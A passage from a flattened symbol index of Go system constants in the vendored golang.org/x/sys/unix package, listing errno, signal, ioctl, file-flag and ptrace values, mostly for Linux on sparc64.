ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 619) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 620) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 621) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 622) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 623) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 624) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 625) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 626) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 627) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 628) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 629) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 630) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 631) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 632) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 633) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 634) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 635) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 636) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 637) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 638) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 639) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 640) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 641) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 642) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 643) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 644) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 645) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 646) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 647) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 648) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 649) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 650) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 651) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 652) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 653) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 654) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 655) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 656) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 657) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 658) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 659) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 660) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 661) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 662) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 663) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 664) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 665) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 666) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 667) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 668) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 669) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 670) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 671) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 672) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 673) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 674) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 675) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 676) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 677) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 678) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 679) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 680) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 681) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 682) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 683) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 684) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 685) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 686) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 687) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 688) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 689) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 690) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 691) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 692) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 693) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 694) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 695) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 696) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 697) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 698) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 699) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 700) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 705) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 706) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 707) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 708) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 709) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 710) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 711) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 712) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 713) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 714) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 715) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 716) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 717) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 718) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 719) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 720) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 721) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 722) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 723) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 724) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 725) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_sparc64.go constant ASI_LEON_DFLUSH (line 14) | ASI_LEON_DFLUSH = 0x11 constant ASI_LEON_IFLUSH (line 15) | ASI_LEON_IFLUSH = 0x10 constant ASI_LEON_MMUFLUSH (line 16) | ASI_LEON_MMUFLUSH = 0x18 constant B1000000 (line 17) | B1000000 = 0x1008 constant B115200 (line 18) | B115200 = 0x1002 constant B1152000 (line 19) | B1152000 = 0x1009 constant B1500000 (line 20) | B1500000 = 0x100a constant B2000000 (line 21) | B2000000 = 0x100b constant B230400 (line 22) | B230400 = 0x1003 constant B2500000 (line 23) | B2500000 = 0x100c constant B3000000 (line 24) | B3000000 = 0x100d constant B3500000 (line 25) | B3500000 = 0x100e constant B4000000 (line 26) | B4000000 = 0x100f constant B460800 (line 27) | B460800 = 0x1004 constant B500000 (line 28) | B500000 = 0x1005 constant B57600 (line 29) | B57600 = 0x1001 constant B576000 (line 30) | B576000 = 0x1006 constant B921600 (line 31) | B921600 = 0x1007 constant BLKALIGNOFF (line 32) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 33) | BLKBSZGET = 0x40081270 constant BLKBSZSET (line 34) | BLKBSZSET = 0x80081271 constant BLKDISCARD (line 35) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 36) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 37) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 38) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 39) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 40) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 41) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 42) | BLKGETSIZE64 = 0x40081272 constant BLKIOMIN (line 43) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 44) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 45) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 46) | BLKRAGET = 0x20001263 constant BLKRASET (line 47) | BLKRASET = 0x20001262 constant BLKROGET (line 48) | BLKROGET = 0x2000125e constant BLKROSET (line 49) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 50) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 51) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 52) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 53) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 54) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 55) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 56) | BLKZEROOUT = 0x2000127f constant BOTHER (line 57) | BOTHER = 0x1000 constant BS1 (line 58) | BS1 = 0x2000 constant BSDLY (line 59) | BSDLY = 0x2000 constant CBAUD (line 60) | CBAUD = 0x100f constant CBAUDEX (line 61) | CBAUDEX = 0x1000 constant CIBAUD (line 62) | CIBAUD = 0x100f0000 constant CLOCAL (line 63) | CLOCAL = 0x800 constant CR1 (line 64) | CR1 = 0x200 constant CR2 (line 65) | CR2 = 0x400 constant CR3 (line 66) | CR3 = 0x600 constant CRDLY (line 67) | CRDLY = 0x600 constant CREAD (line 68) | CREAD = 0x80 constant CS6 (line 69) | CS6 = 0x10 constant CS7 (line 70) | CS7 = 0x20 constant CS8 (line 71) | CS8 = 0x30 constant CSIZE (line 72) | CSIZE = 0x30 constant CSTOPB (line 73) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 74) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 75) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 76) | ECHOCTL = 0x200 constant ECHOE (line 77) | ECHOE = 0x10 constant ECHOK (line 78) | ECHOK = 0x20 constant ECHOKE (line 79) | ECHOKE = 0x800 constant ECHONL (line 80) | ECHONL = 0x40 constant ECHOPRT (line 81) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 82) | EFD_CLOEXEC = 0x400000 constant EFD_NONBLOCK (line 83) | EFD_NONBLOCK = 0x4000 constant EMT_TAGOVF (line 84) | EMT_TAGOVF = 0x1 constant EPOLL_CLOEXEC (line 85) | EPOLL_CLOEXEC = 0x400000 constant EXTPROC (line 86) | EXTPROC = 0x10000 constant FF1 (line 87) | FF1 = 0x8000 constant FFDLY (line 88) | FFDLY = 0x8000 constant FICLONE (line 89) | FICLONE = 0x80049409 constant FICLONERANGE (line 90) | FICLONERANGE = 0x8020940d constant FLUSHO (line 91) | FLUSHO = 0x1000 constant FS_IOC_ENABLE_VERITY (line 92) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 93) | FS_IOC_GETFLAGS = 0x40086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 94) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 95) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 96) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 97) | FS_IOC_SETFLAGS = 0x80086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 98) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 99) | F_GETLK = 0x7 constant F_GETLK64 (line 100) | F_GETLK64 = 0x7 constant F_GETOWN (line 101) | F_GETOWN = 0x5 constant F_RDLCK (line 102) | F_RDLCK = 0x1 constant F_SETLK (line 103) | F_SETLK = 0x8 constant F_SETLK64 (line 104) | F_SETLK64 = 0x8 constant F_SETLKW (line 105) | F_SETLKW = 0x9 constant F_SETLKW64 (line 106) | F_SETLKW64 = 0x9 constant F_SETOWN (line 107) | F_SETOWN = 0x6 constant F_UNLCK (line 108) | F_UNLCK = 0x3 constant F_WRLCK (line 109) | F_WRLCK = 0x2 constant HIDIOCGRAWINFO (line 110) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 111) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 112) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 113) | HUPCL = 0x400 constant ICANON (line 114) | ICANON = 0x2 constant IEXTEN (line 115) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 116) | IN_CLOEXEC = 0x400000 constant IN_NONBLOCK (line 117) | IN_NONBLOCK = 0x4000 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 118) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 119) | ISIG = 0x1 constant IUCLC (line 120) | IUCLC = 0x200 constant IXOFF (line 121) | IXOFF = 0x1000 constant IXON (line 122) | IXON = 0x400 constant MAP_ANON (line 123) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 124) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 125) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 126) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 127) | MAP_GROWSDOWN = 0x200 constant MAP_HUGETLB (line 128) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 129) | MAP_LOCKED = 0x100 constant MAP_NONBLOCK (line 130) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 131) | MAP_NORESERVE = 0x40 constant MAP_POPULATE (line 132) | MAP_POPULATE = 0x8000 constant MAP_RENAME (line 133) | MAP_RENAME = 0x20 constant MAP_STACK (line 134) | MAP_STACK = 0x20000 constant MAP_SYNC (line 135) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 136) | MCL_CURRENT = 0x2000 constant MCL_FUTURE (line 137) | MCL_FUTURE = 0x4000 constant MCL_ONFAULT (line 138) | MCL_ONFAULT = 0x8000 constant MEMERASE (line 139) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 140) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 141) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 142) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 143) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 144) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 145) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 146) | MEMLOCK = 0x80084d05 constant MEMREAD (line 147) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 148) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 149) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 150) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 151) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 152) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 153) | NFDBITS = 0x40 constant NLDLY (line 154) | NLDLY = 0x100 constant NOFLSH (line 155) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 156) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 157) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 158) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 159) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 160) | OLCUC = 0x2 constant ONLCR (line 161) | ONLCR = 0x4 constant OTPERASE (line 162) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 163) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 164) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 165) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 166) | OTPSELECT = 0x40044d0d constant O_APPEND (line 167) | O_APPEND = 0x8 constant O_ASYNC (line 168) | O_ASYNC = 0x40 constant O_CLOEXEC (line 169) | O_CLOEXEC = 0x400000 constant O_CREAT (line 170) | O_CREAT = 0x200 constant O_DIRECT (line 171) | O_DIRECT = 0x100000 constant O_DIRECTORY (line 172) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 173) | O_DSYNC = 0x2000 constant O_EXCL (line 174) | O_EXCL = 0x800 constant O_FSYNC (line 175) | O_FSYNC = 0x802000 constant O_LARGEFILE (line 176) | O_LARGEFILE = 0x0 constant O_NDELAY (line 177) | O_NDELAY = 0x4004 constant O_NOATIME (line 178) | O_NOATIME = 0x200000 constant O_NOCTTY (line 179) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 180) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 181) | O_NONBLOCK = 0x4000 constant O_PATH (line 182) | O_PATH = 0x1000000 constant O_RSYNC (line 183) | O_RSYNC = 0x802000 constant O_SYNC (line 184) | O_SYNC = 0x802000 constant O_TMPFILE (line 185) | O_TMPFILE = 0x2010000 constant O_TRUNC (line 186) | O_TRUNC = 0x400 constant PARENB (line 187) | PARENB = 0x100 constant PARODD (line 188) | PARODD = 0x200 constant PENDIN (line 189) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 190) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 191) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 192) | PERF_EVENT_IOC_ID = 0x40082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 193) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 194) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 195) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 196) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 197) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 198) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 199) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 200) | PERF_EVENT_IOC_SET_FILTER = 0x80082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 201) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 202) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 203) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 204) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 205) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 206) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 207) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 208) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 209) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 210) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 211) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 212) | PPPIOCGIDLE = 0x4010743f constant PPPIOCGIDLE32 (line 213) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 214) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 215) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 216) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 217) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 218) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 219) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 220) | PPPIOCSACTIVE = 0x80107446 constant PPPIOCSASYNCMAP (line 221) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 222) | PPPIOCSCOMPRESS = 0x8010744d constant PPPIOCSDEBUG (line 223) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 224) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 225) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 226) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 227) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 228) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 229) | PPPIOCSPASS = 0x80107447 constant PPPIOCSRASYNCMAP (line 230) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 231) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 232) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 233) | PPPIOCXFERUNIT = 0x2000744e constant PR_SET_PTRACER_ANY (line 234) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETFPAREGS (line 235) | PTRACE_GETFPAREGS = 0x14 constant PTRACE_GETFPREGS (line 236) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETFPREGS64 (line 237) | PTRACE_GETFPREGS64 = 0x19 constant PTRACE_GETREGS64 (line 238) | PTRACE_GETREGS64 = 0x16 constant PTRACE_READDATA (line 239) | PTRACE_READDATA = 0x10 constant PTRACE_READTEXT (line 240) | PTRACE_READTEXT = 0x12 constant PTRACE_SETFPAREGS (line 241) | PTRACE_SETFPAREGS = 0x15 constant PTRACE_SETFPREGS (line 242) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETFPREGS64 (line 243) | PTRACE_SETFPREGS64 = 0x1a constant PTRACE_SETREGS64 (line 244) | PTRACE_SETREGS64 = 0x17 constant PTRACE_SPARC_DETACH (line 245) | PTRACE_SPARC_DETACH = 0xb constant PTRACE_WRITEDATA (line 246) | PTRACE_WRITEDATA = 0x11 constant PTRACE_WRITETEXT (line 247) | PTRACE_WRITETEXT = 0x13 constant PT_FP (line 248) | PT_FP = 0x48 constant PT_G0 (line 249) | PT_G0 = 0x10 constant PT_G1 (line 250) | PT_G1 = 0x14 constant PT_G2 (line 251) | PT_G2 = 0x18 constant PT_G3 (line 252) | PT_G3 = 0x1c constant PT_G4 (line 253) | PT_G4 = 0x20 constant PT_G5 (line 254) | PT_G5 = 0x24 constant PT_G6 (line 255) | PT_G6 = 0x28 constant PT_G7 (line 256) | PT_G7 = 0x2c constant PT_I0 (line 257) | PT_I0 = 0x30 constant PT_I1 (line 258) | PT_I1 = 0x34 constant PT_I2 (line 259) | PT_I2 = 0x38 constant PT_I3 (line 260) | PT_I3 = 0x3c constant PT_I4 (line 261) | PT_I4 = 0x40 constant PT_I5 (line 262) | PT_I5 = 0x44 constant PT_I6 (line 263) | PT_I6 = 0x48 constant PT_I7 (line 264) | PT_I7 = 0x4c constant PT_NPC (line 265) | PT_NPC = 0x8 constant PT_PC (line 266) | PT_PC = 0x4 constant PT_PSR (line 267) | PT_PSR = 0x0 constant PT_REGS_MAGIC (line 268) | PT_REGS_MAGIC = 0x57ac6c00 constant PT_TNPC (line 269) | PT_TNPC = 0x90 constant PT_TPC (line 270) | PT_TPC = 0x88 constant PT_TSTATE (line 271) | PT_TSTATE = 0x80 constant PT_V9_FP (line 272) | PT_V9_FP = 0x70 constant PT_V9_G0 (line 273) | PT_V9_G0 = 0x0 constant PT_V9_G1 (line 274) | PT_V9_G1 = 0x8 constant PT_V9_G2 (line 275) | PT_V9_G2 = 0x10 constant PT_V9_G3 (line 276) | PT_V9_G3 = 0x18 constant PT_V9_G4 (line 277) | PT_V9_G4 = 0x20 constant PT_V9_G5 (line 278) | PT_V9_G5 = 0x28 constant PT_V9_G6 (line 279) | PT_V9_G6 = 0x30 constant PT_V9_G7 (line 280) | PT_V9_G7 = 0x38 constant PT_V9_I0 (line 281) | PT_V9_I0 = 0x40 constant PT_V9_I1 (line 282) | PT_V9_I1 = 0x48 constant PT_V9_I2 (line 283) | PT_V9_I2 = 0x50 constant PT_V9_I3 (line 284) | PT_V9_I3 = 0x58 constant PT_V9_I4 (line 285) | PT_V9_I4 = 0x60 constant PT_V9_I5 (line 286) | PT_V9_I5 = 0x68 constant PT_V9_I6 (line 287) | PT_V9_I6 = 0x70 constant PT_V9_I7 (line 288) | PT_V9_I7 = 0x78 constant PT_V9_MAGIC (line 289) | PT_V9_MAGIC = 0x9c constant PT_V9_TNPC (line 290) | PT_V9_TNPC = 0x90 constant PT_V9_TPC (line 291) | PT_V9_TPC = 0x88 constant PT_V9_TSTATE (line 292) | PT_V9_TSTATE = 0x80 constant PT_V9_Y (line 293) | PT_V9_Y = 0x98 constant PT_WIM (line 294) | PT_WIM = 0x10 constant PT_Y (line 295) | PT_Y = 0xc constant RLIMIT_AS (line 296) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 297) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 298) | RLIMIT_NOFILE = 0x6 constant RLIMIT_NPROC (line 299) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 300) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 301) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 302) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 303) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 304) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 305) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 306) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 307) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 308) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 309) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 310) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 311) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 312) | RTC_EPOCH_READ = 0x4008700d constant RTC_EPOCH_SET (line 313) | RTC_EPOCH_SET = 0x8008700e constant RTC_IRQP_READ (line 314) | RTC_IRQP_READ = 0x4008700b constant RTC_IRQP_SET (line 315) | RTC_IRQP_SET = 0x8008700c constant RTC_PARAM_GET (line 316) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 317) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 318) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 319) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 320) | RTC_PLL_GET = 0x40207011 constant RTC_PLL_SET (line 321) | RTC_PLL_SET = 0x80207012 constant RTC_RD_TIME (line 322) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 323) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 324) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 325) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 326) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 327) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 328) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 329) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 330) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 331) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 332) | SCM_TIMESTAMPING = 0x23 constant SCM_TIMESTAMPING_OPT_STATS (line 333) | SCM_TIMESTAMPING_OPT_STATS = 0x38 constant SCM_TIMESTAMPING_PKTINFO (line 334) | SCM_TIMESTAMPING_PKTINFO = 0x3c constant SCM_TIMESTAMPNS (line 335) | SCM_TIMESTAMPNS = 0x21 constant SCM_TXTIME (line 336) | SCM_TXTIME = 0x3f constant SCM_WIFI_STATUS (line 337) | SCM_WIFI_STATUS = 0x25 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 338) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 339) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant 